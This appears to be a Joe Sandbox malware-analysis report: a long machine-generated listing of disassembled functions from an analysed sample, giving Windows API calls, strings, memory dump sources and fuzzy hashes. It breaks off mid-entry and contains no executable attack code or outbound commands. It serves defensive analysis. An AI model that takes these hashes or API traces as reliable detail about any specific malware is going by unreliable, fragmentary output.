                                                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D78EE2
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00D78F25
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D78F5C
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00D78F68
                                                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D78F78
                                                                                                                                                                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,00D76691), ref: 00D78F87
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D78FA4
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00D78FB0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                  • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                  • Opcode ID: a58a43f9d6ae116f478da223fcb90206bb1c8bd05c428783897a3d7b7ebfdb50
                                                                                                                                                                                                                                                                  • Instruction ID: 9a5a2e6553b68b5ddbd59b637df35d8e0e9bb991dd936d998a10712d2cd1b85f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a58a43f9d6ae116f478da223fcb90206bb1c8bd05c428783897a3d7b7ebfdb50
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7061E0B1940214BEEB149F64CC49FBEB7B8EF08B10F108106F919D61D1EB75A980EBB0
                                                                                                                                                                                                                                                                  Function 00D548BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00D5493D
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D54948
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D5499F
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D549DD
                                                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00D54A1B
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D54A63
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D54A9E
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D54ACC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                  • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                  • Opcode ID: 5f2dc14b45a828ca1793581181d91da9b809786b52e1786ce94eef649f117f6b
                                                                                                                                                                                                                                                                  • Instruction ID: 522a51321d133cca92e61ff2bc1e6b0a6f352877e1eab84bff1112c60cb6d066
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f2dc14b45a828ca1793581181d91da9b809786b52e1786ce94eef649f117f6b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8471D2726083019FCB10EF25C84196BB7E4EF94769F04492DFC9597261EB31DD89CBA2
                                                                                                                                                                                                                                                                  Function 00D46382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00D46395
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D463A7
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00D463BE
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00D463D3
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00D463D9
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00D463E9
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00D463EF
                                                                                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D46410
                                                                                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D4642A
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D46433
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4649A
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00D464D6
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D464DC
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D464E3
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00D4653A
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00D46547
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 00D4656C
                                                                                                                                                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D46596
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 895679908-0
                                                                                                                                                                                                                                                                  • Opcode ID: 35c98c542fc7a60f27018db1fcbed8c562a6ead94d2de5b2781de65e789ca8cd
                                                                                                                                                                                                                                                                  • Instruction ID: 7759766691ae68461f580c191935af4416454889058b31a2d731e26c03012487
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35c98c542fc7a60f27018db1fcbed8c562a6ead94d2de5b2781de65e789ca8cd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23716E71900709AFDB20DFA8CE45AAEBBF5FF48704F144918E58BE26A0D775E944CB60
                                                                                                                                                                                                                                                                  Function 00D6086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00D60884
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00D6088F
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00D6089A
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00D608A5
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00D608B0
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00D608BB
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00D608C6
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00D608D1
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00D608DC
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00D608E7
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00D608F2
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00D608FD
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00D60908
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00D60913
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00D6091E
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00D60929
                                                                                                                                                                                                                                                                  • GetCursorInfo.USER32(?), ref: 00D60939
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D6097B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4dbc657cecf0ed70c2d3e6b48598e4f5fa1c7646cc11154000c7be8bb22ef910
                                                                                                                                                                                                                                                                  • Instruction ID: 8f5cbe878f948b7f04f6e1a098dadbdba13ef6c8b99e7cc4dd7212adc97f7ac1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dbc657cecf0ed70c2d3e6b48598e4f5fa1c7646cc11154000c7be8bb22ef910
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C415470D483196BDB109FBA8C8585FBFE9FF04754B54452AE11CE7291DA78D801CFA1
                                                                                                                                                                                                                                                                  Function 00D00436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D00436
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00DB170C,00000FA0,AC4DA415,?,?,?,?,00D22733,000000FF), ref: 00D0048C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D22733,000000FF), ref: 00D00497
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D22733,000000FF), ref: 00D004A8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D004BE
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D004CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D004DA
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D00505
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D00510
                                                                                                                                                                                                                                                                  • ___scrt_fastfail.LIBCMT ref: 00D00457
                                                                                                                                                                                                                                                                    • Part of subcall function 00D00413: __onexit.LIBCMT ref: 00D00419
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • WakeAllConditionVariable, xrefs: 00D004D2
                                                                                                                                                                                                                                                                  • InitializeConditionVariable, xrefs: 00D004B8
                                                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 00D004A3
                                                                                                                                                                                                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D00492
                                                                                                                                                                                                                                                                  • SleepConditionVariableCS, xrefs: 00D004C4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                  • Opcode ID: 1f1a2fb64b5f99b17ae8c53b161538ea3482ffc3fb3e7fd6bf6047f845927a59
                                                                                                                                                                                                                                                                  • Instruction ID: fe4ff0c8273567405cd09c1c7bf70df3de358a9f4be73d65f453c769ed7dabaa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f1a2fb64b5f99b17ae8c53b161538ea3482ffc3fb3e7fd6bf6047f845927a59
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21D136A44714BFD7106BA4AC0ABA93FA9EF45B61F540229F90DD37C0EF7098448AB5
                                                                                                                                                                                                                                                                  Function 00D43A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                  • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                  • Opcode ID: b48906b44ae42f1a7722ee9c643056e88ca6015d1283c6005f65c1cddca58105
                                                                                                                                                                                                                                                                  • Instruction ID: 096c19e81fa5b3006686e6877be44eaa3874fd17e4569d01b94d13547a30f5a9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b48906b44ae42f1a7722ee9c643056e88ca6015d1283c6005f65c1cddca58105
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE19232A00516DBCB189FB8C8817EEBBB5FF54710F184229E556E7250DB30DE9997B0
                                                                                                                                                                                                                                                                  Function 00D54F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(00000000,00000000,00D7DCD0), ref: 00D54F6C
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D54F80
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D54FDE
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D55039
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D55084
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D550EC
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFFD52: _wcslen.LIBCMT ref: 00CFFD5D
                                                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00DA7C10,00000061), ref: 00D55188
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                  • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                  • Opcode ID: 2656375901e95f6dd14d5372ddd3af6f1f1e9689843a496b2fa4b777646e62e7
                                                                                                                                                                                                                                                                  • Instruction ID: f034aee292a2cff4ce9ee1e083c9688f4a72c21add8f21c761c0520f9735bbb2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2656375901e95f6dd14d5372ddd3af6f1f1e9689843a496b2fa4b777646e62e7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FB115316087029FCB11DF29D8A0A6EB7E5EFA4725F14491CFD9683299D730D848C7B2
                                                                                                                                                                                                                                                                  Function 00D6BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BBF8
                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D6BC10
                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D6BC34
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BC60
                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D6BC74
                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D6BC96
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BD92
                                                                                                                                                                                                                                                                    • Part of subcall function 00D50F4E: GetStdHandle.KERNEL32(000000F6), ref: 00D50F6D
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BDAB
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6BDC6
                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D6BE16
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00D6BE67
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D6BE99
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6BEAA
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6BEBC
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6BECE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D6BF43
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                  • Opcode ID: 3e25f09501677b98df2cae10bb9b88dc6aa10aeab96d5c41292ba85726f10172
                                                                                                                                                                                                                                                                  • Instruction ID: 56668ccdce96852c01850659216f1d82ca80d9709a8f5de9154199b5e4db9b0b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e25f09501677b98df2cae10bb9b88dc6aa10aeab96d5c41292ba85726f10172
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F1A0715043409FCB14EF25C891B6ABBE5FF84320F18855EF8998B2A2DB31DD85CB62
                                                                                                                                                                                                                                                                  Function 00D64A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00D7DCD0), ref: 00D64B18
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00D64B2A
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00D7DCD0), ref: 00D64B4F
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00D7DCD0), ref: 00D64B9B
                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028,?,00D7DCD0), ref: 00D64C05
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000009), ref: 00D64CBF
                                                                                                                                                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D64D25
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00D64D4F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                  • Opcode ID: 88d6b55d5e196fa5b260e16079d201e914eafd3bd2efdb9db952f4870b9e0cd1
